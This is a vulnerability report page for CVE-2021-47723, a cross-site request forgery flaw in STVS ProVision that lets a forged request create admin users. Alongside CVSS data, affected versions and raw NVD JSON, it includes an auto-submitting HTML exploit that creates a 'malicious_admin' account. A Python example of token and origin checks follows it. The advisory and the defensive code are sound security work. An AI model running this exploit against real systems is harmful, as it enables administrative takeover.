Security Vulnerability Report
CVE-2021-47723 CVSS 8.8 HIGH

CVE-2021-47723

Published: 2025-12-09 21:15:51
Last Modified: 2026-02-17 20:36:45

Description

STVS ProVision 5.9.10 contains a cross-site request forgery vulnerability that allows attackers to perform actions with administrative privileges by exploiting unvalidated HTTP requests. An attacker who lures an authenticated administrator to a malicious web site can trigger the forged request, allowing them to create new admin users.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:stvs:provision:5.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.7:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.8.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.9.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.9.7:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.9.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:stvs:provision:5.9.10:*:*:*:*:*:*:* - VULNERABLE
STVS ProVision < 5.9.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CSRF PoC for CVE-2021-47723: Create Admin User in STVS ProVision -->
<!DOCTYPE html>
<html>
<head>
  <title>STVS ProVision CSRF Exploit - CVE-2021-47723</title>
</head>
<body>
  <h1>STVS ProVision CSRF Vulnerability Test</h1>
  <p>This page demonstrates the CSRF vulnerability in STVS ProVision 5.9.10</p>

  <!-- Auto-submit form to create admin user -->
  <form id="csrfForm" action="http://target:8080/api/admin/users" method="POST" style="display:none;">
    <input type="hidden" name="action" value="create">
    <input type="hidden" name="username" value="malicious_admin">
    <input type="hidden" name="password" value="P@ssw0rd123">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="role" value="admin">
    <input type="hidden" name="privileges" value="full">
  </form>

  <script>
    // Automatically submit the form when page loads
    document.getElementById('csrfForm').submit();
    console.log('CSRF exploit sent - Creating admin user');
  </script>

  <p>If you see this message, the exploit may have been executed.</p>
</body>
</html>
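The root cause described above is that the server accepts a state-changing POST on the strength of the browser's session cookie alone, so a hidden form auto-submitted from any other site is indistinguishable from an administrator's own click. The following added example (not code from STVS ProVision or from the advisory authors; the ProVision code base is not on this page) shows the two standard server-side checks that stop this pattern: a per-session synchroniser token that a cross-site page cannot read, and an Origin/Referer allow-list as defence in depth. The `Session`/`Request` classes, the origin `http://provision.local:8080` and the attacker origin `http://attacker.example` are constructed for the demonstration.

```python
"""Server-side CSRF protection for state-changing requests (added example).

Assumptions: the application keeps a server-side session per logged-in user and
can attach a hidden csrf_token field to every legitimate form it renders.
"""
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Methods that must never change state; CSRF checks are applied to everything else.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


@dataclass
class Session:
    """Hypothetical server-side session; the token is unguessable and never leaves this user's pages."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request (constructed for the example)."""
    method: str
    path: str
    headers: dict[str, str]
    form: dict[str, str]


def request_origin(headers: dict[str, str]) -> str | None:
    """Return the scheme://host[:port] the browser says the request came from.

    Browsers set Origin on cross-site form POSTs and a page cannot override it,
    which is what makes the allow-list meaningful. Referer is used as a fallback.
    """
    origin = headers.get("Origin")
    if origin:
        return origin
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def is_request_allowed(req: Request, session: Session, allowed_origins: set[str]) -> tuple[bool, str]:
    """Decide whether a request may change state; returns (allowed, reason).

    Fails closed: an unsafe request with no recognisable origin is rejected
    rather than trusted, and a missing token is treated like a wrong one.
    """
    if req.method.upper() in SAFE_METHODS:
        return True, "safe method"
    origin = request_origin(req.headers)
    if origin not in allowed_origins:
        return False, "cross-site origin"
    submitted = req.form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be recovered byte by byte.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


def demo() -> dict[str, tuple[bool, str]]:
    """Run the check against three constructed requests shaped like the PoC above."""
    allowed = {"http://provision.local:8080"}
    session = Session(user="admin")
    # 1. The auto-submitted form from an attacker-controlled page: session cookie
    #    rides along, but the browser stamps the attacker's Origin and no token exists.
    forged = Request("POST", "/api/admin/users",
                     {"Origin": "http://attacker.example"},
                     {"action": "create", "username": "malicious_admin", "role": "admin"})
    # 2. Same request from the application's own UI but with the token left out.
    same_site_no_token = Request("POST", "/api/admin/users",
                                 {"Origin": "http://provision.local:8080"},
                                 {"action": "create", "username": "new_operator", "role": "admin"})
    # 3. The legitimate administrator's submission carrying the rendered token.
    legitimate = Request("POST", "/api/admin/users",
                         {"Origin": "http://provision.local:8080"},
                         {"action": "create", "username": "new_operator", "role": "admin",
                          "csrf_token": session.csrf_token})
    return {
        "forged": is_request_allowed(forged, session, allowed),
        "same_site_no_token": is_request_allowed(same_site_no_token, session, allowed),
        "legitimate": is_request_allowed(legitimate, session, allowed),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:20s} -> {verdict}")
```

The token check alone is sufficient against the attack shown; the origin check is cheap insurance for the day a token is accidentally dropped from a form, and its rejections are worth logging, since a burst of "cross-site origin" denials against an admin endpoint is a useful detection signal. Rejecting unsafe requests that carry neither Origin nor Referer is a deliberate fail-closed choice; relax it only for clients you have verified cannot be driven by a browser.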

References

http://www.stvs.ch - Product
https://www.exploit-db.com/exploits/49482 - Technical Description
https://www.vulncheck.com/advisories/stvs-provision-cross-site-request-forgery-add-admin - Third Party Advisory
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php - Third Party Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47723", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:50.770", "lastModified": "2026-02-17T20:36:44.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "STVS ProVision 5.9.10 contains a cross-site request forgery vulnerability that allows attackers to perform actions with administrative privileges by exploiting unvalidated HTTP requests. Attackers can visit malicious web sites to trigger the forge request, allowing them to create new admin users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "5C0F2D09-CDB3-4DAA-8C6A-1CFF4B5D2AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.6:*:*:*:*:*:*:*", "matchCriteriaId": "C75EA53C-2681-479C-B911-7CE5AEE00E69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.7:*:*:*:*:*:*:*", "matchCriteriaId": "A5EDCA0E-E4BF-4D4A-92D7-7433CC23A9EC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.8.6:*:*:*:*:*:*:*", "matchCriteriaId": "21131E39-42C6-43BC-8C53-7D4036D3B3AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "807E2E4F-85FB-46AD-8ABF-12ECBF30047C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "5AC87B35-CCF1-43B8-9DB4-8C7D2BEF51FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.7:*:*:*:*:*:*:*", "matchCriteriaId": "83FEE9FC-3E43-47F1-BA35-2BB7C7DAA443"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.9:*:*:*:*:*:*:*", "matchCriteriaId": "D8BE45C5-7BD9-4853-99C9-D8969EB8FC94"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:stvs:provision:5.9.10:*:*:*:*:*:*:*", "matchCriteriaId": "495B9F3E-DD0F-4010-AE20-1A763AF04D7C"}]}]}], "references": [{"url": "http://www.stvs.ch", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49482", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://www.vulncheck.com/advisories/stvs-provision-cross-site-request-forgery-add-admin", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}